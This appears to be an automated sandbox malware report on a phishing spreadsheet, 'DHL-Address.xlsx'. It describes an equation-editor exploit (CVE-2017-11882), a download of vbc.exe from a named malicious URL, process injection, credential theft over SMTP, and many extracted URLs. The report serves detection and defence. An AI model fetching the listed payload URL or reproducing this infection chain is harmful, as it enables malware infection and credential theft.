              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 339078 Sample: DHL-Address.xlsx Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 31 Found malware configuration 2->31 33 Antivirus detection for URL or domain 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 17 other signatures 2->37 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 37 13 2->12         started        process3 dnsIp4 29 globuserinessserverfiletransferprotocol.mangospot.net 192.210.214.178, 49165, 80 AS-COLOCROSSINGUS United States 7->29 21 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 47 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->47 14 vbc.exe 7->14         started        25 C:\Users\user\Desktop\~$DHL-Address.xlsx, data 12->25 dropped file5 signatures6 process7 signatures8 49 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->49 51 Machine Learning detection for dropped file 14->51 53 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->53 55 Injects a PE file into a foreign processes 14->55 17 vbc.exe 4 14->17         started        process9 dnsIp10 27 smtp.privateemail.com 199.193.7.228, 49166, 49168, 587 NAMECHEAP-NETUS United States 17->27 39 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->39 41 Tries to steal Mail credentials (via file access) 17->41 43 Tries to harvest and steal ftp login credentials 17->43 45 Tries to harvest and steal browser information (history, passwords, etc) 17->45 signatures11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              DHL-Address.xlsx48%VirustotalBrowse
              DHL-Address.xlsx49%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
              DHL-Address.xlsx100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\vbc.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              5.2.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

              Domains

              SourceDetectionScannerLabelLink
              globuserinessserverfiletransferprotocol.mangospot.net4%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
              http://www.a-cert.at0E0%URL Reputationsafe
              http://www.a-cert.at0E0%URL Reputationsafe
              http://www.a-cert.at0E0%URL Reputationsafe
              http://www.a-cert.at0E0%URL Reputationsafe
              http://www.e-me.lv/repository00%URL Reputationsafe
              http://www.e-me.lv/repository00%URL Reputationsafe
              http://www.e-me.lv/repository00%URL Reputationsafe
              http://www.e-me.lv/repository00%URL Reputationsafe
              http://www.acabogacia.org/doc00%URL Reputationsafe
              http://www.acabogacia.org/doc00%URL Reputationsafe
              http://www.acabogacia.org/doc00%URL Reputationsafe
              http://www.acabogacia.org/doc00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://www.certifikat.dk/repository00%URL Reputationsafe
              http://www.certifikat.dk/repository00%URL Reputationsafe
              http://www.certifikat.dk/repository00%URL Reputationsafe
              http://www.certifikat.dk/repository00%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
              http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
              http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
              http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
              http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
              http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
              http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
              http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
              http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
              http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
              http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
              http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
              http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
              http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
              http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
              http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
              http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
              http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
              http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
              http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
              http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
              http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
              http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
              http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
              https://api.ipify.org%0%Avira URL Cloudsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              http://servername/isapibackend.dll0%Avira URL Cloudsafe
              http://www.ssc.lt/cps030%URL Reputationsafe
              http://www.ssc.lt/cps030%URL Reputationsafe
              http://www.ssc.lt/cps030%URL Reputationsafe
              http://www.ssc.lt/cps030%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              globuserinessserverfiletransferprotocol.mangospot.net
              192.210.214.178
              truetrueunknown
              smtp.privateemail.com
              199.193.7.228
              truefalse
                high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://globuserinessserverfiletransferprotocol.mangospot.net/csrss/vbc.exetrue
                • Avira URL Cloud: malware
                unknown
                https://jUxNbkiTmoSYxyvoDh.nettrue
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://127.0.0.1:HTTP/1.1vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.a-cert.at0Evbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.e-me.lv/repository0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.acabogacia.org/doc0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://crl.chambersign.org/chambersroot.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.certifikat.dk/repository0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.chambersign.org1vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.diginotar.nl/cps/pkioverheid0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.pkioverheid.nl/policies/root-policy0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://crl.ssc.lt/root-c/cacrl.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://ca.disig.sk/ca/crl/ca_disig.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.certplus.com/CRL/class3P.crl0vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://repository.infonotary.com/cps/qcps.html0$vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.post.trust.ie/reposit/cps.html0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.certplus.com/CRL/class2.crl0vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.disig.sk/ca/crl/ca_disig.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://ocsp.infonotary.com/responder.cgi0Vvbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.sk.ee/cps/0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Evbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.ipify.org%vbc.exe, 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://servername/isapibackend.dllvbc.exe, 00000005.00000002.2363028590.0000000006E50000.00000002.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://www.ssc.lt/cps03vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://crl.oces.certifikat.dk/oces.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%havbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.certicamara.com/dpc/0Zvbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                  high
                  http://crl.pki.wellsfargo.com/wsprca.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                    high
                    http://www.dnie.es/dpc0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.rootca.or.kr/rca/cps.html0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.trustcenter.de/guidelines0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://certificates.starfieldtech.com/repository/1604vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                      high
                      http://smtp.privateemail.comvbc.exe, 00000005.00000002.2360554779.0000000002658000.00000004.00000001.sdmpfalse
                        high
                        http://www.entrust.net/CRL/Client1.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000005.00000002.2362156931.0000000005BD0000.00000002.00000001.sdmpfalse
                            high
                            http://www.disig.sk/ca0fvbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.sk.ee/juur/crl/0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.chambersign.org/chambersignroot.crl0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.xrampsecurity.com/XGCA.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.quovadis.bm0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.ssc.lt/root-a/cacrl.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.firmaprofesional.com0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://www.netlock.net/docsvbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crlvbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.entrust.net/2048ca.crl0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                              high
                              http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                high
                                http://cps.chambersign.org/cps/publicnotaryroot.html0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.e-trust.be/CPS/QNcertsvbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.certicamara.com/certicamaraca.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  high
                                  http://fedir.comsign.co.il/crl/ComSignCA.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://ocsp.sectigo.com0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://ocsp.entrust.net03vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://cps.chambersign.org/cps/chambersroot.html0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.acabogacia.org0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://MLrjrg.comvbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ca.sia.it/seccli/repository/CPS0vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://crl.securetrust.com/STCA.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.certicamara.com/certicamaraca.crl0;vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.e-szigno.hu/RootCA.crt0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.quovadisglobal.com/cps0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.valicert.com/1vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.e-szigno.hu/SZSZ/0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                          high
                                          https://api.ipify.org%GETMozilla/5.0vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          low
                                          http://www.%s.comPAvbc.exe, 00000005.00000002.2362156931.0000000005BD0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          low
                                          http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://ocsp.quovadisoffshore.com0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://ocsp.entrust.net0Dvbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://cps.chambersign.org/cps/chambersignroot.html0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://DynDns.comDynDNSvbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://sectigo.com/CPS0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://crl.entrust.net/server1.crl0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.ancert.com/cps0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://ca.sia.it/seccli/repository/CRL.der0Jvbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://rca.e-szigno.hu/ocsp0-vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                              high
                                              https://www.netlock.hu/docs/vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.a-cert.at/certificate-policy.html0;vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
